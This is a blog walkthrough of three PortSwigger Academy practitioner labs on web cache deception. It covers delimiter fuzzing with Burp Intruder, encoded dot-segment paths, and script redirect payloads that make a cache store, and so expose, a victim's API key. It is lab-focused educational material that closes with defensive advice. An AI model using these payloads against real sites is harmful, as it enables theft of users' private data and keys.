1100 words
6 minutes
Web Cache Deception - Practitioner | PortSwigger
2024-09-10
PortSwigger
PortSwigger
/
WebCache
/
WebSecurity

Prerequisites#

To follow along, ensure you have:

  • A PortSwigger Academy account
  • Burp Suite (Community or Professional)
  • FoxyProxy (or equivalent proxy setup)
  • JavaScript enabled in your browser

Web Cache Deception: Exploiting Path Delimiters and Normalization (Practitioner Labs)#

This blog post explores Web Cache Deception, a vulnerability arising from discrepancies in URL processing between web servers and caching layers. We’ll cover three Practitioner-level labs from PortSwigger’s Web Security Academy that demonstrate advanced techniques for exploiting path delimiters, origin server normalization, and cache server normalization.

Table of Contents#

Introduction to Web Cache Deception#

Web Cache Deception occurs when attackers manipulate URL paths to trick cache servers into storing sensitive, user-specific content (e.g., API keys, user profiles) as static resources (e.g., .css or .js files). This vulnerability stems from mismatches in how origin servers and cache servers handle URL paths, particularly involving delimiters, encoded characters, and path normalization.

The labs covered demonstrate:

  • Path Delimiter Exploitation: Using characters like ; or ? that are ignored by the origin server but treated literally by the cache.
  • Origin Server Normalization: Exploiting differences in resolving encoded path segments (e.g., ..%2f).
  • Cache Server Normalization: Leveraging cache-specific decoding of paths to cache sensitive content.

Lab 1: Exploiting Path Delimiters for Web Cache Deception#

Lab Description#

This lab shows how attackers can abuse path delimiter variations (e.g., ; or ?) to trick caches into storing sensitive content under static-looking paths.

Lab Description

Technical Overview#

Delimiter discrepancies arise when the origin server and cache server interpret special characters differently:

  • Framework Behavior:
    • ; (semicolon) is used for matrix parameters in Java Spring.
    • . (dot) denotes response format in Ruby on Rails.
    • %00 (null byte) acts as a terminator in OpenLiteSpeed.
  • Cache Behavior: Caches treat these characters literally, assuming they’re part of a static file path (e.g., /account;foo.css).

Attack Flow:

  1. Craft a URL like /my-account;fake.css.
  2. The origin server ignores ;fake.css and returns sensitive data (e.g., user profile).
  3. The cache, seeing .css, stores the response as a static resource.
  4. Attackers access the cached response at /my-account;fake.css.

Delimiter Decoding:

  • Encoded delimiters like %23 (#) or %3F (?) can exploit decoding mismatches.
  • Example: /profile%23wcd.css → Cache sees .css, origin decodes %23 to # and processes /profile.

Exploitation Steps:

  • Use Burp Intruder to test delimiters (;, ., !, %00, etc.) in raw and encoded forms.
  • Check response headers (e.g., X-Cache) and content to confirm caching of dynamic responses.

Solution#

  1. Configure FoxyProxy to route traffic through Burp Suite. Disable Intercept and log in as wiener:peter. Login Screen
  2. In Proxy > HTTP History, locate GET /my-account. Right-click and send to Repeater. HTTP History
  3. In Repeater, test /my-account/abc404 Not Found (no caching). 404 Response
  4. Test /my-accountabc404 Not Found (baseline for delimiter testing). 404 Response
  5. Send /my-account to Intruder. Set payload position as /my-account§§abc and use PortSwigger’s delimiter list. Intruder Setup
  6. Disable URL-encode in Payload settings. Payload Encoding
  7. Run the attack. Note ; and ? return 200 OK with the API key, indicating they are delimiters. Intruder Results
  8. In Repeater, test /my-account?abc.js200 OK, no caching (cache uses ? as a delimiter). Repeater Response
  9. On the Exploit Server, craft an exploit to redirect user carlos to /my-account;hanzala.js: 
    <script>document.location="https://YOUR-LAB-ID.web-security-academy.net/my-account;hanzala.js"</script>
    Exploit Server
  10. Deliver the exploit. Revisit /my-account;hanzala.js in Repeater to retrieve Carlos’s API key. API Key Response
  11. Submit the API key to complete the lab. Lab Completion

Lab 2: Exploiting Origin Server Normalization for Web Cache Deception#

Lab Description#

This lab demonstrates how mismatches in URL normalization between the origin and cache servers allow attackers to cache sensitive content under static directories using encoded dot-segments (e.g., ..%2f).

Lab Description

Technical Overview#

Static directory cache rules (e.g., /resources, /static) instruct caches to store responses as static resources. If the origin server resolves encoded paths (e.g., /resources/..%2fprofile to /profile) differently from the cache, attackers can:

  1. Craft a URL matching the cache’s static rule (e.g., /resources/..%2fmy-account).
  2. The origin server resolves it to a sensitive endpoint (/my-account).
  3. The cache stores the response under the static path.

Example:

/resources/..%2fprofile
→ Cache: Matches /resources rule, caches response
→ Origin: Resolves to /profile, returns sensitive data

Exploitation Steps:

  • Use Burp Suite to test path normalization with encoded dot-segments (..%2f).
  • Check for X-Cache headers to confirm caching behavior.

Solution#

  1. Configure FoxyProxy and Burp Suite. Log in as wiener:peter. Login Screen
  2. In Proxy > HTTP History, note /resources paths are cached. Send a /resources request to Repeater. HTTP History
  3. Test /resources/..%2fRESOURCES404 Not Found with X-Cache: miss. 404 Response
  4. Resend → X-Cache: hit, indicating cache doesn’t decode dot-segments. Cached Response
  5. Test /resources/..%2fmy-account200 OK with API key and X-Cache: miss. 200 Response
  6. Resend → X-Cache: hit. Cached Response
  7. On the Exploit Server, craft an exploit: 
    <script>document.location="https://YOUR-LAB-ID.web-security-academy.net/resources/..%2fmy-account"</script>
    Exploit Server
  8. Deliver the exploit. Visit /resources/..%2fmy-account to retrieve Carlos’s API key. API Key Response
  9. Submit the API key to complete the lab. Lab Completion

Lab 3: Exploiting Cache Server Normalization for Web Cache Deception#

Lab Description#

This lab explores how cache server normalization discrepancies, particularly in decoding encoded dot-segments (e.g., %2f%2e%2e%2f), allow caching of sensitive content under static paths.

Lab Description

Technical Overview#

If the cache server decodes paths (e.g., /my-account%2f%2e%2e%2fresources to /resources) but the origin server truncates at a delimiter (e.g., %23 for #), attackers can:

  1. Craft a URL that the cache maps to a static directory.
  2. The origin server processes it as a sensitive endpoint.
  3. The cache stores the response under the static path.

Example:

/my-account%23%2f%2e%2e%2fresources
→ Cache: Resolves to /resources, caches response
→ Origin: Truncates at %23, processes /my-account

Exploitation Steps:

  • Test encoded dot-segments and delimiters (%23, %3f) to identify cache vs. origin behavior.
  • Use X-Cache headers to confirm caching.

Solution#

  1. Configure FoxyProxy and Burp Suite. Log in as wiener:peter. Login Screen
  2. In Proxy > HTTP History, note caching for /resources paths. Send a /resources request to Repeater. HTTP History
  3. Test /aaa/..%2fresources/YOUR-RESOURCE404 Not Found with X-Cache: miss. 404 Response
  4. Resend → X-Cache: hit, confirming cache resolves dot-segments. Cached Response
  5. Test /resources/.%2fYOUR-RESOURCE404 Not Found, no caching. 404 Response
  6. Test /my-account%2f%2e%2e%2fresources200 OK with API key, no caching. 200 Response
  7. Test /my-account%23%2f%2e%2e%2fresources200 OK with X-Cache: miss. 200 Response
  8. Resend → X-Cache: hit. Cached Response
  9. On the Exploit Server, craft an exploit: 
    <script>document.location="https://YOUR-LAB-ID.web-security-academy.net/my-account%23%2f%2e%2e%2fresources?hanzala"</script>
    Exploit Server
  10. Deliver the exploit. Visit /my-account%23%2f%2e%2e%2fresources?hanzala to retrieve Carlos’s API key. API Key Response
  11. Submit the API key to complete the lab. Lab Completion

Conclusion#

These Practitioner-level labs demonstrate how subtle inconsistencies in how cache servers and origin servers interpret URLs can lead to serious vulnerabilities. By exploiting differences in delimiter parsing, path normalization, and encoded character handling, attackers can trick caching layers into storing and serving sensitive user data.

As a developer or security engineer, it’s critical to:

  • Ensure authentication checks are not bypassable via alternative path encodings.
  • Prevent caching of user-specific responses under any circumstances.
  • Understand how your CDN and application framework parse and normalize paths.

Even seemingly innocuous URL structures can have severe consequences if caching layers and backend logic fall out of sync. Proper cache controls, strict routing logic, and thorough testing are essential defenses against these attacks.

Web Cache Deception - Practitioner | PortSwigger
https://blog.hanzalaghayasabbasi.com/posts/web-cache-deception-practitioner/
Author
Hanzala Ghayas Abbasi
Published at
2024-09-10
License
CC BY-NC-SA 4.0
Web Cache Deception - Expert | PortSwigger
Web Cache Deception - Apprentice | PortSwigger
© 2025 Hanzala Ghayas Abbasi. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari